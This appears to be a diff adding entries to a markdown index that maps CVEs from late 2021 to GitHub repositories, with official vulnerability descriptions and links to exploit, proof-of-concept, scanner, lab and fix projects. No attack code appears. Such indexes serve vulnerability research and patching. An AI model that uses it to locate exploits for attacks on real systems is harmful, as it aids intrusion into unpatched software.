+- [ankur-katiyar/log4j-docker](https://github.com/ankur-katiyar/log4j-docker)
+- [immunityinc/Log4j-JNDIServer](https://github.com/immunityinc/Log4j-JNDIServer)
+- [DANSI/PowerShell-Log4J-Scanner](https://github.com/DANSI/PowerShell-Log4J-Scanner)
+- [suniastar/scan-log4shell](https://github.com/suniastar/scan-log4shell)
+- [shivakumarjayaraman/log4jvulnerability-CVE-2021-44228](https://github.com/shivakumarjayaraman/log4jvulnerability-CVE-2021-44228)
+- [j3kz/CVE-2021-44228-PoC](https://github.com/j3kz/CVE-2021-44228-PoC)
+- [Apipia/log4j-pcap-activity](https://github.com/Apipia/log4j-pcap-activity)
+- [axelcurmi/log4shell-docker-lab](https://github.com/axelcurmi/log4shell-docker-lab)
+- [otaviokr/log4j-2021-vulnerability-study](https://github.com/otaviokr/log4j-2021-vulnerability-study)
+- [kkyehit/log4j_CVE-2021-44228](https://github.com/kkyehit/log4j_CVE-2021-44228)
+- [trickyearlobe/inspec-log4j](https://github.com/trickyearlobe/inspec-log4j)
+- [TheInterception/Log4J-Simulation-Tool](https://github.com/TheInterception/Log4J-Simulation-Tool)
+- [KeysAU/Get-log4j-Windows-local](https://github.com/KeysAU/Get-log4j-Windows-local)
+- [mschmnet/Log4Shell-demo](https://github.com/mschmnet/Log4Shell-demo)
+- [Rk-000/Log4j_scan_Advance](https://github.com/Rk-000/Log4j_scan_Advance)
+- [puzzlepeaches/Log4jCenter](https://github.com/puzzlepeaches/Log4jCenter)
+- [Labout/log4shell-rmi-poc](https://github.com/Labout/log4shell-rmi-poc)
+- [TotallyNotAHaxxer/f-for-java](https://github.com/TotallyNotAHaxxer/f-for-java)
+- [spasam/log4j2-exploit](https://github.com/spasam/log4j2-exploit)
+- [bumheehan/cve-2021-44228-log4j-test](https://github.com/bumheehan/cve-2021-44228-log4j-test)
+- [JagarYousef/log4j-dork-scanner](https://github.com/JagarYousef/log4j-dork-scanner)
+- [dmitsuo/log4shell-war-fixer](https://github.com/dmitsuo/log4shell-war-fixer)
+- [Y0-kan/Log4jShell-Scan](https://github.com/Y0-kan/Log4jShell-Scan)
+- [julian911015/Log4j-Scanner-Exploit](https://github.com/julian911015/Log4j-Scanner-Exploit)
+- [intel-xeon/CVE-2021-44228---detection-with-PowerShell](https://github.com/intel-xeon/CVE-2021-44228---detection-with-PowerShell)
+- [chandru-gunasekaran/log4j-fix-CVE-2021-44228](https://github.com/chandru-gunasekaran/log4j-fix-CVE-2021-44228)
+- [erickrr-bd/TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp)
+- [snapattack/damn-vulnerable-log4j-app](https://github.com/snapattack/damn-vulnerable-log4j-app)
+- [sassoftware/loguccino](https://github.com/sassoftware/loguccino)
+- [xx-zhang/apache-log4j2-CVE-2021-44228](https://github.com/xx-zhang/apache-log4j2-CVE-2021-44228)
+- [r00thunter/Log4Shell-Scanner](https://github.com/r00thunter/Log4Shell-Scanner)
+- [mn-io/log4j-spring-vuln-poc](https://github.com/mn-io/log4j-spring-vuln-poc)
+- [rejupillai/log4j2-hack-springboot](https://github.com/rejupillai/log4j2-hack-springboot)
+- [lucab85/log4j-cve-2021-44228](https://github.com/lucab85/log4j-cve-2021-44228)
+- [BabooPan/Log4Shell-CVE-2021-44228-Demo](https://github.com/BabooPan/Log4Shell-CVE-2021-44228-Demo)
+- [ossie-git/log4shell_sentinel](https://github.com/ossie-git/log4shell_sentinel)
+- [r00thunter/Log4Shell](https://github.com/r00thunter/Log4Shell)
+- [asyzdykov/cve-2021-44228-fix-jars](https://github.com/asyzdykov/cve-2021-44228-fix-jars)
+- [BJLIYANLIANG/log4j-scanner](https://github.com/BJLIYANLIANG/log4j-scanner)
+- [badb33f/Apache-Log4j-POC](https://github.com/badb33f/Apache-Log4j-POC)
+- [TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit](https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit)
+- [lucab85/ansible-role-log4shell](https://github.com/lucab85/ansible-role-log4shell)
+- [grimch/log4j-CVE-2021-44228-workaround](https://github.com/grimch/log4j-CVE-2021-44228-workaround)
+- [cybersecurityworks553/log4j-shell-csw](https://github.com/cybersecurityworks553/log4j-shell-csw)
+- [Toolsec/log4j-scan](https://github.com/Toolsec/log4j-scan)
+- [puzzlepeaches/Log4jUnifi](https://github.com/puzzlepeaches/Log4jUnifi)
+- [many-fac3d-g0d/apache-tomcat-log4j](https://github.com/many-fac3d-g0d/apache-tomcat-log4j)
+- [marcourbano/CVE-2021-44228](https://github.com/marcourbano/CVE-2021-44228)
+- [bsigouin/log4shell-vulnerable-app](https://github.com/bsigouin/log4shell-vulnerable-app)
+- [ToxicEnvelope/XSYS-Log4J2Shell-Ex](https://github.com/ToxicEnvelope/XSYS-Log4J2Shell-Ex)
+- [felipe8398/ModSec-log4j2](https://github.com/felipe8398/ModSec-log4j2)
+- [ceyhuncamli/Log4j_Attacker_IPList](https://github.com/ceyhuncamli/Log4j_Attacker_IPList)
+- [mazhar-hassan/log4j-vulnerability](https://github.com/mazhar-hassan/log4j-vulnerability)
+- [xungzzz/VTI-IOCs-CVE-2021-44228](https://github.com/xungzzz/VTI-IOCs-CVE-2021-44228)
+- [s-retlaw/l4s_poc](https://github.com/s-retlaw/l4s_poc)
+- [Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main](https://github.com/Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main)
+- [yesspider-hacker/log4j-payload-generator](https://github.com/yesspider-hacker/log4j-payload-generator)
+- [LinkMJB/log4shell_scanner](https://github.com/LinkMJB/log4shell_scanner)
+- [NS-Sp4ce/Vm4J](https://github.com/NS-Sp4ce/Vm4J)
+- [PoneyClairDeLune/LogJackFix](https://github.com/PoneyClairDeLune/LogJackFix)
+- [MarceloLeite2604/log4j-vulnerability](https://github.com/MarceloLeite2604/log4j-vulnerability)
+- [romanutti/log4shell-vulnerable-app](https://github.com/romanutti/log4shell-vulnerable-app)
+- [marklindsey11/-CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CVE-2021-44228-https-nvd.](https://github.com/marklindsey11/-CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CVE-2021-44228-https-nvd.)
+- [marklindsey11/gh-repo-clone-marklindsey11--CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CV](https://github.com/marklindsey11/gh-repo-clone-marklindsey11--CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CV)
+- [mklinkj/log4j2-test](https://github.com/mklinkj/log4j2-test)
+- [4jfinder/4jfinder.github.io](https://github.com/4jfinder/4jfinder.github.io)
+- [alexpena5635/CVE-2021-44228_scanner-main-Modified-](https://github.com/alexpena5635/CVE-2021-44228_scanner-main-Modified-)
+- [kanitan/log4j2-web-vulnerable](https://github.com/kanitan/log4j2-web-vulnerable)
+- [mr-r3b00t/CVE-2021-44228](https://github.com/mr-r3b00t/CVE-2021-44228)
+- [ChandanShastri/Log4j_Vulnerability_Demo](https://github.com/ChandanShastri/Log4j_Vulnerability_Demo)
+- [puzzlepeaches/Log4jHorizon](https://github.com/puzzlepeaches/Log4jHorizon)
+- [Vulnmachines/log4jshell_CVE-2021-44228](https://github.com/Vulnmachines/log4jshell_CVE-2021-44228)
+- [mr-vill4in/log4j-fuzzer](https://github.com/mr-vill4in/log4j-fuzzer)
+- [nix-xin/vuln4japi](https://github.com/nix-xin/vuln4japi)
+- [maximofernandezriera/CVE-2021-44228](https://github.com/maximofernandezriera/CVE-2021-44228)
+- [mebibite/log4jhound](https://github.com/mebibite/log4jhound)
+- [jxerome/log4shell](https://github.com/jxerome/log4shell)
+- [solitarysp/Log4j-CVE-2021-44228](https://github.com/solitarysp/Log4j-CVE-2021-44228)
+- [atlassion/log4j-exploit-builder](https://github.com/atlassion/log4j-exploit-builder)
+- [atlassion/RS4LOGJ-CVE-2021-44228](https://github.com/atlassion/RS4LOGJ-CVE-2021-44228)
+- [sdogancesur/log4j_github_repository](https://github.com/sdogancesur/log4j_github_repository)
+- [jrocia/Search-log4Jvuln-AppScanSTD](https://github.com/jrocia/Search-log4Jvuln-AppScanSTD)
+- [aajuvonen/log4stdin](https://github.com/aajuvonen/log4stdin)
+- [arnaudluti/PS-CVE-2021-44228](https://github.com/arnaudluti/PS-CVE-2021-44228)
+- [ColdFusionX/CVE-2021-44228-Log4Shell-POC](https://github.com/ColdFusionX/CVE-2021-44228-Log4Shell-POC)
+- [robrankin/cve-2021-44228-waf-tests](https://github.com/robrankin/cve-2021-44228-waf-tests)
+- [0xalwayslucky/log4j-polkit-poc](https://github.com/0xalwayslucky/log4j-polkit-poc)
+- [y-security/yLog4j](https://github.com/y-security/yLog4j)
+- [FeryaelJustice/Log4Shell](https://github.com/FeryaelJustice/Log4Shell)
+- [hotpotcookie/CVE-2021-44228-white-box](https://github.com/hotpotcookie/CVE-2021-44228-white-box)
+- [s-retlaw/l4srs](https://github.com/s-retlaw/l4srs)
+- [Ananya-0306/Log-4j-scanner](https://github.com/Ananya-0306/Log-4j-scanner)
+- [paulvkitor/log4shellwithlog4j2_13_3](https://github.com/paulvkitor/log4shellwithlog4j2_13_3)
+- [MiguelM001/vulescanjndilookup](https://github.com/MiguelM001/vulescanjndilookup)
+- [Jun-5heng/CVE-2021-44228](https://github.com/Jun-5heng/CVE-2021-44228)
+- [honypot/CVE-2021-44228](https://github.com/honypot/CVE-2021-44228)
+- [honypot/CVE-2021-44228-vuln-app](https://github.com/honypot/CVE-2021-44228-vuln-app)
+- [vulnerable-apps/log4shell-honeypot](https://github.com/vulnerable-apps/log4shell-honeypot)
+- [manishkanyal/log4j-scanner](https://github.com/manishkanyal/log4j-scanner)
+- [TPower2112/Writing-Sample-1](https://github.com/TPower2112/Writing-Sample-1)
+- [Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228](https://github.com/Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228)
+- [r3kind1e/Log4Shell-obfuscated-payloads-generator](https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator)
+- [Phineas09/CVE-2021-44228](https://github.com/Phineas09/CVE-2021-44228)
+- [hassaanahmad813/log4j](https://github.com/hassaanahmad813/log4j)
+- [yuuki1967/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/yuuki1967/CVE-2021-44228-Apache-Log4j-Rce)
+- [moshuum/tf-log4j-aws-poc](https://github.com/moshuum/tf-log4j-aws-poc)
+- [jaehnri/CVE-2021-44228](https://github.com/jaehnri/CVE-2021-44228)
+- [ra890927/Log4Shell-CVE-2021-44228-Demo](https://github.com/ra890927/Log4Shell-CVE-2021-44228-Demo)
+- [bughuntar/log4j-scan](https://github.com/bughuntar/log4j-scan)
+- [vidrez/Ethical-Hacking-Report-Log4j](https://github.com/vidrez/Ethical-Hacking-Report-Log4j)
+- [vino-theva/CVE-2021-44228](https://github.com/vino-theva/CVE-2021-44228)
+- [tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228](https://github.com/tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228)
+- [eurogig/jankybank](https://github.com/eurogig/jankybank)
+- [digital-dev/Log4j-CVE-2021-44228-Remediation](https://github.com/digital-dev/Log4j-CVE-2021-44228-Remediation)
+- [ocastel/log4j-shell-poc](https://github.com/ocastel/log4j-shell-poc)
+- [bcdunbar/CVE-2021-44228-poc](https://github.com/bcdunbar/CVE-2021-44228-poc)
+- [srcporter/CVE-2021-44228](https://github.com/srcporter/CVE-2021-44228)
+- [Nexolanta/log4j2_CVE-2021-44228](https://github.com/Nexolanta/log4j2_CVE-2021-44228)
+- [demining/Log4j-Vulnerability](https://github.com/demining/Log4j-Vulnerability)
+- [pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC](https://github.com/pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC)
+- [Sma-Das/Log4j-PoC](https://github.com/Sma-Das/Log4j-PoC)
+- [heeloo123/CVE-2021-44228](https://github.com/heeloo123/CVE-2021-44228)
+- [53buahapel/log4shell-vulnweb](https://github.com/53buahapel/log4shell-vulnweb)
+- [demonrvm/Log4ShellRemediation](https://github.com/demonrvm/Log4ShellRemediation)
+- [funcid/log4j-exploit-fork-bomb](https://github.com/funcid/log4j-exploit-fork-bomb)
+- [MrHarshvardhan/PY-Log4j-RCE-Scanner](https://github.com/MrHarshvardhan/PY-Log4j-RCE-Scanner)
+- [Muhammad-Ali007/Log4j_CVE-2021-44228](https://github.com/Muhammad-Ali007/Log4j_CVE-2021-44228)
+- [Tai-e/CVE-2021-44228](https://github.com/Tai-e/CVE-2021-44228)
+- [LucasPDiniz/CVE-2021-44228](https://github.com/LucasPDiniz/CVE-2021-44228)
+- [felixslama/log4shell-minecraft-demo](https://github.com/felixslama/log4shell-minecraft-demo)
+- [ShlomiRex/log4shell_lab](https://github.com/ShlomiRex/log4shell_lab)
+- [dcm2406/CVE-Lab](https://github.com/dcm2406/CVE-Lab)
+- [scabench/l4j-tp1](https://github.com/scabench/l4j-tp1)
+- [scabench/l4j-fp1](https://github.com/scabench/l4j-fp1)
+- [KtokKawu/l4s-vulnapp](https://github.com/KtokKawu/l4s-vulnapp)
+- [sec13b/CVE-2021-44228-POC](https://github.com/sec13b/CVE-2021-44228-POC)
+- [KirkDJohnson/Wireshark](https://github.com/KirkDJohnson/Wireshark)
+- [YangHyperData/LOGJ4_PocShell_CVE-2021-44228](https://github.com/YangHyperData/LOGJ4_PocShell_CVE-2021-44228)
+- [Hoanle396/CVE-2021-44228-demo](https://github.com/Hoanle396/CVE-2021-44228-demo)
+- [tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment](https://github.com/tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment)
+
+### CVE-2021-44255 (2022-01-31)
+
+Authenticated remote code execution in MotionEye <= 0.42.1 and MotioneEyeOS <= 20200606 allows a remote attacker to upload a configuration backup file containing a malicious python pickle file which will execute arbitrary code on the server.
+
+
+- [pizza-power/motioneye-authenticated-RCE](https://github.com/pizza-power/motioneye-authenticated-RCE)
+
+### CVE-2021-44270
+- [pinpinsec/Anviz-Access-Control-Authentication-Bypass](https://github.com/pinpinsec/Anviz-Access-Control-Authentication-Bypass)
+
+### CVE-2021-44428 (2021-11-29)
+
+Pinkie 2.15 allows remote attackers to cause a denial of service (daemon crash) via a TFTP read (RRQ) request, aka opcode 1.
+
+
+- [z3bul0n/log4jtest](https://github.com/z3bul0n/log4jtest)
+
+### CVE-2021-44521 (2022-02-11)
+
+When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.
+
+
+- [WoodenKlaas/CVE-2021-44521](https://github.com/WoodenKlaas/CVE-2021-44521)
+- [Yeyvo/poc-CVE-2021-44521](https://github.com/Yeyvo/poc-CVE-2021-44521)
+
+### CVE-2021-44529 (2021-12-08)
+
+A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).
+
+
+- [jkana/CVE-2021-44529](https://github.com/jkana/CVE-2021-44529)
+- [jax7sec/CVE-2021-44529](https://github.com/jax7sec/CVE-2021-44529)
+
+### CVE-2021-44582 (2022-06-10)
+
+A Privilege Escalation vulnerability exists in Sourcecodester Money Transfer Management System 1.0, which allows a remote malicious user to gain elevated privileges to the Admin role via any URL.
+
+
+- [warmachine-57/CVE-2021-44582](https://github.com/warmachine-57/CVE-2021-44582)
+
+### CVE-2021-44593 (2022-01-21)
+
+Simple College Website 1.0 is vulnerable to unauthenticated file upload & remote code execution via UNION-based SQL injection in the username parameter on /admin/login.php.
+
+
+- [Mister-Joe/CVE-2021-44593](https://github.com/Mister-Joe/CVE-2021-44593)
+
+### CVE-2021-44731 (2022-02-17)
+
+A race condition existed in the snapd 2.54.2 snap-confine binary when preparing a private mount namespace for a snap. This could allow a local attacker to gain root privileges by bind-mounting their own contents inside the snap's private mount namespace and causing snap-confine to execute arbitrary code and hence gain privilege escalation. Fixed in snapd versions 2.54.3+18.04, 2.54.3+20.04 and 2.54.3+21.10.1
+
+
+- [deeexcee-io/CVE-2021-44731-snap-confine-SUID](https://github.com/deeexcee-io/CVE-2021-44731-snap-confine-SUID)
+
+### CVE-2021-44733 (2021-12-22)
+
+A use-after-free exists in drivers/tee/tee_shm.c in the TEE subsystem in the Linux kernel through 5.15.11. This occurs because of a race condition in tee_shm_get_from_id during an attempt to free a shared memory object.
+
+
+- [pjlantz/optee-qemu](https://github.com/pjlantz/optee-qemu)
+
+### CVE-2021-44790 (2021-12-20)
+
+A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.
+
+
+- [nuPacaChi/-CVE-2021-44790](https://github.com/nuPacaChi/-CVE-2021-44790)
+
+### CVE-2021-44827 (2022-03-04)
+
+There is remote authenticated OS command injection on TP-Link Archer C20i 0.9.1 3.2 v003a.0 Build 170221 Rel.55462n devices vie the X_TP_ExternalIPv6Address HTTP parameter, allowing a remote attacker to run arbitrary commands on the router with root privileges.
+
+
+- [full-disclosure/CVE-2021-44827](https://github.com/full-disclosure/CVE-2021-44827)
+
+### CVE-2021-44832 (2021-12-28)
+
+Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.
+
+
+- [cckuailong/log4j_RCE_CVE-2021-44832](https://github.com/cckuailong/log4j_RCE_CVE-2021-44832)
+- [name/log4j-scanner](https://github.com/name/log4j-scanner)
+
+### CVE-2021-44852 (2022-01-01)
+
+An issue was discovered in BS_RCIO64.sys in Biostar RACING GT Evo 2.1.1905.1700. A low-integrity process can open the driver's device object and issue IOCTLs to read or write to arbitrary physical memory locations (or call an arbitrary address), leading to execution of arbitrary code. This is associated with 0x226040, 0x226044, and 0x226000.
+
+
+- [CrackerCat/CVE-2021-44852](https://github.com/CrackerCat/CVE-2021-44852)
+
+### CVE-2021-44906 (2022-03-17)
+
+Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).
+
+
+- [nevermoe/CVE-2021-44906](https://github.com/nevermoe/CVE-2021-44906)
+
+### CVE-2021-44909
+- [g1thub3r1st4/CVE-2021-44909](https://github.com/g1thub3r1st4/CVE-2021-44909)
+
+### CVE-2021-44910
+- [dockererr/CVE-2021-44910_SpringBlade](https://github.com/dockererr/CVE-2021-44910_SpringBlade)
+
+### CVE-2021-45007 (2022-02-20)
+
+Plesk 18.0.37 is affected by a Cross Site Request Forgery (CSRF) vulnerability that allows an attacker to insert data on the user and admin panel. NOTE: the vendor states that this is only a site-specific problem on websites of one or more Plesk users
+
+
+- [AS4mir/CVE-2021-45007](https://github.com/AS4mir/CVE-2021-45007)
+
+### CVE-2021-45008 (2022-02-21)
+
+Plesk CMS 18.0.37 is affected by an insecure permissions vulnerability that allows privilege Escalation from user to admin rights. OTE: the vendor states that this is only a site-specific problem on websites of one or more Plesk users
+
+
+- [AS4mir/CVE-2021-45008](https://github.com/AS4mir/CVE-2021-45008)
+
+### CVE-2021-45010 (2022-03-15)
+
+A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution.
+
+
+- [febinrev/CVE-2021-45010-TinyFileManager-Exploit](https://github.com/febinrev/CVE-2021-45010-TinyFileManager-Exploit)
+- [BKreisel/CVE-2021-45010](https://github.com/BKreisel/CVE-2021-45010)
+- [Syd-SydneyJr/CVE-2021-45010](https://github.com/Syd-SydneyJr/CVE-2021-45010)
+
+### CVE-2021-45026 (2022-06-17)
+
+ASG technologies ASG-Zena Cross Platform Server Enterprise Edition 4.2.1 is vulnerable to Cross Site Scripting (XSS).
+
+
+- [JetP1ane/Zena-CVE-2021-45026](https://github.com/JetP1ane/Zena-CVE-2021-45026)
+
+### CVE-2021-45041 (2021-12-19)
+
+SuiteCRM before 7.12.2 and 8.x before 8.0.1 allows authenticated SQL injection via the Tooltips action in the Project module, involving resource_id and start_date.
+
+
+- [manuelz120/CVE-2021-45041](https://github.com/manuelz120/CVE-2021-45041)
+
+### CVE-2021-45043 (2021-12-15)
+
+HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter.
+
+
+- [crypt0g30rgy/cve-2021-45043](https://github.com/crypt0g30rgy/cve-2021-45043)
+
+### CVE-2021-45046 (2021-12-14)
+
+It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
+
+
+- [cckuailong/Log4j_CVE-2021-45046](https://github.com/cckuailong/Log4j_CVE-2021-45046)
+- [BobTheShoplifter/CVE-2021-45046-Info](https://github.com/BobTheShoplifter/CVE-2021-45046-Info)
+- [tejas-nagchandi/CVE-2021-45046](https://github.com/tejas-nagchandi/CVE-2021-45046)
+- [pravin-pp/log4j2-CVE-2021-45046](https://github.com/pravin-pp/log4j2-CVE-2021-45046)
+- [mergebase/log4j-samples](https://github.com/mergebase/log4j-samples)
+- [lukepasek/log4jjndilookupremove](https://github.com/lukepasek/log4jjndilookupremove)
+- [ludy-dev/cve-2021-45046](https://github.com/ludy-dev/cve-2021-45046)
+- [lijiejie/log4j2_vul_local_scanner](https://github.com/lijiejie/log4j2_vul_local_scanner)
+- [CaptanMoss/Log4Shell-Sandbox-Signature](https://github.com/CaptanMoss/Log4Shell-Sandbox-Signature)
+- [shaily29-eng/CyberSecurity_CVE-2021-45046](https://github.com/shaily29-eng/CyberSecurity_CVE-2021-45046)
+
+### CVE-2021-45067 (2022-01-11)
+
+Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an Access of Memory Location After End of Buffer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
+
+
+- [hacksysteam/CVE-2021-45067](https://github.com/hacksysteam/CVE-2021-45067)
+
+### CVE-2021-45105 (2021-12-18)
+
+Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.
+
+
+- [cckuailong/Log4j_dos_CVE-2021-45105](https://github.com/cckuailong/Log4j_dos_CVE-2021-45105)
+- [pravin-pp/log4j2-CVE-2021-45105](https://github.com/pravin-pp/log4j2-CVE-2021-45105)
+- [tejas-nagchandi/CVE-2021-45105](https://github.com/tejas-nagchandi/CVE-2021-45105)
+- [iAmSOScArEd/log4j2_dos_exploit](https://github.com/iAmSOScArEd/log4j2_dos_exploit)
+- [dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105](https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105)
+- [dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105](https://github.com/dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105)
+- [dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v](https://github.com/dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v)
+- [dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1](https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1)
+- [sakuraji-labs/log4j-remediation](https://github.com/sakuraji-labs/log4j-remediation)
+
+### CVE-2021-45232 (2021-12-27)
+
+In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication.
+
+
+- [Osyanina/westone-CVE-2021-45232-scanner](https://github.com/Osyanina/westone-CVE-2021-45232-scanner)
+- [badboycxcc/CVE-2021-45232-POC](https://github.com/badboycxcc/CVE-2021-45232-POC)
+- [LTiDi2000/CVE-2021-45232](https://github.com/LTiDi2000/CVE-2021-45232)
+- [Ilovewomen/cve-2021-45232](https://github.com/Ilovewomen/cve-2021-45232)
+- [jxpsx/CVE-2021-45232-RCE](https://github.com/jxpsx/CVE-2021-45232-RCE)
+- [wuppp/cve-2021-45232-exp](https://github.com/wuppp/cve-2021-45232-exp)
+- [dskho/CVE-2021-45232](https://github.com/dskho/CVE-2021-45232)
+- [xiju2003/-cve-2021-45232](https://github.com/xiju2003/-cve-2021-45232)
+- [GYLQ/CVE-2021-45232-RCE](https://github.com/GYLQ/CVE-2021-45232-RCE)
+- [fany0r/CVE-2021-45232-RCE](https://github.com/fany0r/CVE-2021-45232-RCE)
+- [yggcwhat/Demo](https://github.com/yggcwhat/Demo)
+- [yggcwhat/CVE-2021-45232](https://github.com/yggcwhat/CVE-2021-45232)
+- [YutuSec/Apisix_Crack](https://github.com/YutuSec/Apisix_Crack)
+
+### CVE-2021-45416 (2022-02-01)
+
+Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules/Scheduling/Courses.php script.
+
+
+- [86x/CVE-2021-45416](https://github.com/86x/CVE-2021-45416)
+- [dnr6419/CVE-2021-45416](https://github.com/dnr6419/CVE-2021-45416)
+
+### CVE-2021-45468 (2022-01-14)
+
+Imperva Web Application Firewall (WAF) before 2021-12-23 allows remote unauthenticated attackers to use "Content-Encoding: gzip" to evade WAF security controls and send malicious HTTP POST requests to web servers behind the WAF.
+
+
+- [0xhaggis/Imperva_gzip_bypass](https://github.com/0xhaggis/Imperva_gzip_bypass)
+
+### CVE-2021-45485 (2021-12-25)
+
+In the IPv6 implementation in the Linux kernel before 5.13.3, net/ipv6/output_core.c has an information leak because of certain use of a hash table which, although big, doesn't properly consider that IPv6-based attackers can typically choose among many IPv6 source addresses.
+
+
+- [Satheesh575555/linux-4.19.72_CVE-2021-45485](https://github.com/Satheesh575555/linux-4.19.72_CVE-2021-45485)
+
+### CVE-2021-45744 (2022-01-06)
+
+A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel.
+
+
+- [plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS)
+- [plsanu/CVE-2021-45744](https://github.com/plsanu/CVE-2021-45744)
+
+### CVE-2021-45745 (2022-01-06)
+
+A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel.
+
+
+- [plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS)
+- [plsanu/CVE-2021-45745](https://github.com/plsanu/CVE-2021-45745)
+
+### CVE-2021-45897 (2022-01-28)
+
+SuiteCRM before 7.12.3 and 8.x before 8.0.2 allows remote code execution.
+
+
+- [manuelz120/CVE-2021-45897](https://github.com/manuelz120/CVE-2021-45897)
+
+### CVE-2021-45901 (2022-02-10)
+
+The password-reset form in ServiceNow Orlando provides different responses to invalid authentication attempts depending on whether the username exists.
+
+
+- [9lyph/CVE-2021-45901](https://github.com/9lyph/CVE-2021-45901)
+
+### CVE-2021-45960 (2022-01-01)
+
+In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).
+
+
+- [nanopathi/external_expat_AOSP10_r33_CVE-2021-45960](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2021-45960)
+- [Trinadh465/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-](https://github.com/Trinadh465/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-)
+- [hshivhare67/external_expat_v2.2.6_CVE-2021-45960](https://github.com/hshivhare67/external_expat_v2.2.6_CVE-2021-45960)
+
+### CVE-2021-46005 (2022-01-18)
+
+Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
+
+
+- [nawed20002/CVE-2021-46005](https://github.com/nawed20002/CVE-2021-46005)
+
+### CVE-2021-46063 (2022-02-18)
+
+MCMS v5.2.5 was discovered to contain a Server Side Template Injection (SSTI) vulnerability via the Template Management module.
+
+
+- [miguelc49/CVE-2021-46063-2](https://github.com/miguelc49/CVE-2021-46063-2)
